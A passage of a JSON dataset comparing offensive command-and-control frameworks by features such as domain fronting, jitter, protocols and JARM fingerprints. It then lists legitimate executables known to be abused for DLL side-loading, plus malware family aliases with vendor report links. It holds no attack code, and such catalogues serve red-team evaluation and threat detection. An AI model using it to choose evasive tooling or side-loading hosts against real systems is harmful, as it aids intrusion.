"https://scythe.io", + "twitter": "@scythe_io", + "evaluator": "@Adam_Mashinchi", + "date": "7/7/2020", + "version": "3", + "implementation": "Binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "Curve25519", + "stego": "Yes", + "proxy_aware": "Yes", + "domainfront": "Yes", + 
"custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad16d2ad2ad22c42d42d0000006f254909a73bf62f6b28507e9fb451b5", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Serpentine", + "license": "MIT", + "price": "NA", + "github": "https://github.com/jafarlihi/serpentine", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Shad0w", + "license": "MIT", + "price": "NA", + "github": "https://github.com/bats3c/shad0w", + "site": "", + "twitter": "@_batsec_", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + 
"smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Shadow Workers", + "license": "MIT", + "price": "NA", + "github": "https://github.com/shadow-workers/shadow-workers", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "SharpC2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/SharpC2/SharpC2/tree/dev", + "site": "https://rastamouse.me/2020/05/sharpc2/", + "twitter": "@_RastaMouse @_xpn_", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + 
"http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "SilentTrinity", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/byt3bl33d3r/SILENTTRINITY", + "site": "", + "twitter": "@byt3bl33d3r", + "evaluator": "@0sm0s1z", + "date": "11/13/2019", + "version": "0.4.6dev", + "implementation": "Binary", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "Boolang", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "ECDHE", + "stego": "No", + "proxy_aware": "No", + "domainfront": "Yes", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#silenttrinity bloodhoundhq.slack.com", + "slack_members": "489", + "gh_issues": "67", + "notes": "" + }, + { + "name": "SK8PARK/RAT", + "license": "NA", + "price": "NA", + "github": "https://github.com/slyd0g/", + "site": "", + "twitter": "@slyd0g", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "Yes", + "slingshot": "", + "kali": 
"", + "server": "Python", + "implant": "C++", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "Yes", + "windows": "", + "linux": "", + "macos": "", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "Yes", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "SK8PARK is server and SK8RAT is implant" + }, + { + "name": "Slack-C2Bot", + "license": "NA", + "price": "NA", + "github": "https://github.com/praetorian-inc/slack-c2bot", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "Yes", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "Yes", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "Slack" + }, + { + "name": "Slackor", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/n00py/Slackor", + "site": "", + 
"twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Sliver", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/BishopFox/sliver", + "site": "", + "twitter": "@LittleJoeTables @rkervell @bishopfox", + "evaluator": "@jorgeorchilles", + "date": "11/5/2019", + "version": "0.0.6", + "implementation": "Binary", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Go", + "implant": "Go", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "mTLS", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "Yes", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad00041d2ad2ad41da5207249a18099be84ef3c8811adc883", + 
"actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "131", + "notes": "Good for evasion" + }, + { + "name": "SQLC2", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/NetSPI/SQLC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Throwback", + "license": "GNU GPL2", + "price": "NA", + "github": "https://github.com/silentbreaksec/Throwback", + "site": "", + "twitter": "@SilentBreakSec", + "evaluator": "@malcomvetter", + "date": "2/24/2020", + "version": "Aug 2017", + "implementation": "shell script", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "php", + "implant": "C++", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "RC4", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + 
"chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "1", + "notes": "No updates in 5 years; web UI not authenticated" + }, + { + "name": "ThunderShell", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Mr-Un1k0d3r/ThunderShell", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "ToRat", + "license": "Unlicense", + "price": "NA", + "github": "https://github.com/lu4p/ToRat", + "site": "", + "twitter": "@lu4p3", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": 
"", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Trevor", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/trustedsec/trevorc2/", + "site": "", + "twitter": "@HackingDave", + "evaluator": "@cabbagesalad2", + "date": "10/16/2019", + "version": "1.1", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python/PowerShell", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "https://nasbench.medium.com/understanding-detecting-c2-frameworks-trevorc2-2a9ce6f1f425", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "5", + "notes": "" + }, + { + "name": "Violent Fungus", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/sogonsec/ViolentFungus-C2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", 
+ "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Void-RAT", + "license": "NA", + "price": "NA", + "github": "https://github.com/KadeDev/Void-RAT", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "", + "notes": "" + }, + { + "name": "Voodoo", + "license": "Commercial", + "price": "$2,000", + "github": "", + "site": "https://www.voodooops.com/", + "twitter": "@professor__plum", + "evaluator": "@kevinlustic", + "date": "2/12/2020", + "version": "0.2.3", + "implementation": "run.py", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + 
"api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS + ChaCha20-Poly1305", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "s2universe.slack.com", + "slack_members": "189", + "gh_issues": "NA", + "notes": "Community edition available for evaluation and linked off the main site" + }, + { + "name": "WarFox", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/FULLSHADE/WarFox/", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "WEASEL", + "license": "MIT", + "price": "NA", + "github": "https://github.com/facebookincubator/WEASEL", + "site": "", + "twitter": "@ucsenoi", + "evaluator": 
"@jorgeorchilles", + "date": "12/3/2019", + "version": "1", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "3", + "notes": "Beacons via DNS" + }, + { + "name": "Zuthaka", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/pucarasec/zuthaka", + "site": "", + "twitter": "@pucara", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + } + ], + "tools": [ + { + 
"names": [ + "wwlib.dll ", + "WinwordUpdates.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://medium.com/@sp1d3rm4n/apt32-oceanlotus-m%E1%BB%99t-chi%E1%BA%BFn-d%E1%BB%8Bch-apt-b%C3%A0i-b%E1%BA%A3n-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-ph%E1%BA%A7n-1-9975574e905" + ] + }, + { + "names": [ + "pcAnywhere Thinprobe Application", + "thinprobe.exe", + "thinhostprobedll.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + ] + }, + { + "names": [ + "fakerx86.exe", + "Symbolic debugger for Microsoft Windows", + "dbgeng.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://unit42.paloaltonetworks.com/new-attacks-linked-to-c0d0s0-group/" + ] + }, + { + "names": [ + "Chrome.exe", + "chrome_frame_helper.dll", + "Chrome browser" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "searchindexer.exe, searchprotoclhost.exe", + "msfte.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ] + }, + { + "names": [ + "googleupdate.exe", + "Google Update", + "goopdate.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ] + }, + { + "names": [ + "Kaspersky\u00e2\u0080\u0099s Avpia", + "product_info.dll", + "avpia.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ] + }, + { + "names": [ + "NvSmartMax.dll", + "NVIDIA Smart Maximise Helper Host", + "NvSmart.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ] + }, + { + "names": [ + "mcvsmap.exe" + ], + "comments": null, + "family": [], + "links": [ + 
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ] + }, + { + "names": [ + "RASTLS.EXE" + ], + "comments": null, + "family": [], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ] + }, + { + "names": [ + "hcc.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "hkcmd.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Mc.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "MsMpEng.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "msseces.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "OInfoP11.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "OleView.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "rc.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "LOLWLauncher.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "fsstm.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "AShld.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "fsguidll.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcf.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcupdui.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcut.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "ACLUI.DLL" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "POETWLauncher.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "ssMUIDLL.dll", + "RunHelp.exe" + ], + "comments": null, + "family": [], + "links": [ + 
"https://unit42.paloaltonetworks.com/plugx-uses-legitimate-samsung-application-for-dll-side-loading/" + ] + }, + { + "names": [ + "sep_NE.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "setup.dll" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "tplcdclr.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Ushata.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcvsmap.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "OINFO11.exe", + "Oinfo11.ocx" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Zegost", + "Moudoor", + "Piano Gh0st", + "Gh0st RAT" + ], + "comments": null, + "family": [], + "links": [ + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://sentinelone.com/blogs/the-curious-case-of-gh0st-malware/", + "http://researchcenter.paloaltonetworks.com/2015/09/musical-chairs-multi-year-campaign-involving-new-variant-of-gh0st-malware/", + "https://cysinfo.com/hunting-and-decrypting-communications-of-gh0st-rat-in-memory/" + ] + }, + { + "names": [ + "Darkmoon", + "PIVY", + "Poison Ivy" + ], + "comments": null, + "family": [], + "links": [ + "http://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf" + ] + }, + { + "names": [ + "9002 RAT", + "BKDR_MDMBOT", + "Naid", + "McRAT", + "HydraQ" + ], + "comments": null, + "family": [], + "links": [ + "https://cysinfo.com/hunting-apt-rat-9002-in-memory-using-volatility-plugin/", + "http://cybercampaigns.net/wp-content/uploads/2013/05/Hydraq.pdf" + ] + }, + { + "names": [ + "Gaolmay", + "Matrix RAT", + "Hikit" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Sensode", + "Zxshell" + ], + "comments": null, + "family": [], + "links": [ + "http://pastebin.com/jCaLHvkM", + "https://blogs.cisco.com/security/talos/opening-zxshell" + ] + }, + { + "names": [ + 
"Fexel", + "DeputyDog" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Korplug", + "Thoper", + "Sogu", + "PlugX", + "Kaba", + "Destory RAT" + ], + "comments": "Often uses DLL side-loading", + "family": [ + "PlugX" + ], + "links": [ + "http://blogs.cisco.com/security/talos/threat-spotlight-group-72", + "https://www.circl.lu/pub/tr-24/", + "http://labs.lastline.com/an-analysis-of-plugx" + ] + }, + { + "names": [ + "Lecna", + "BARYS", + "BACKSPACe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "WarriorPride", + "Regin", + "QUERTY", + "Prax" + ], + "comments": "FEYES malware", + "family": [], + "links": [] + }, + { + "names": [ + "TokenControl", + "HttpBrowser" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "TravNet", + "Netfile", + "RedStar", + "NetTraveler" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Fucobha", + "IceFog" + ], + "comments": null, + "family": [], + "links": [ + "https://web.archive.org/web/20160825001253/http://www.kaspersky.com/about/news/virus/2013/Kaspersky_Lab_exposes_Icefog_a_new_cyber-espionage_campaign_focusing_on_supply_chain_attacks", + "https://securelist.com/blog/research/57331/the-icefog-apt-a-tale-of-cloak-and-three-daggers/" + ] + }, + { + "names": [ + "CTran", + "HTran", + "Xdoor", + "ONHAT (similar)" + ], + "comments": "Chinese Tunneling Tool", + "family": [], + "links": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/htran/" + ] + }, + { + "names": [ + "Agent.BTZ", + "SillyFDC" + ], + "comments": null, + "family": [], + "links": [ + "http://cybercampaigns.net/wp-content/uploads/2013/05/Agent-BTZ.pdf" + ] + }, + { + "names": [ + "Comfoo" + ], + "comments": "RSA incident, Red October", + "family": [], + "links": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/" + ] + }, + { + "names": [ + "DNSChanger", + "RSPlug" + ], + "comments": null, + 
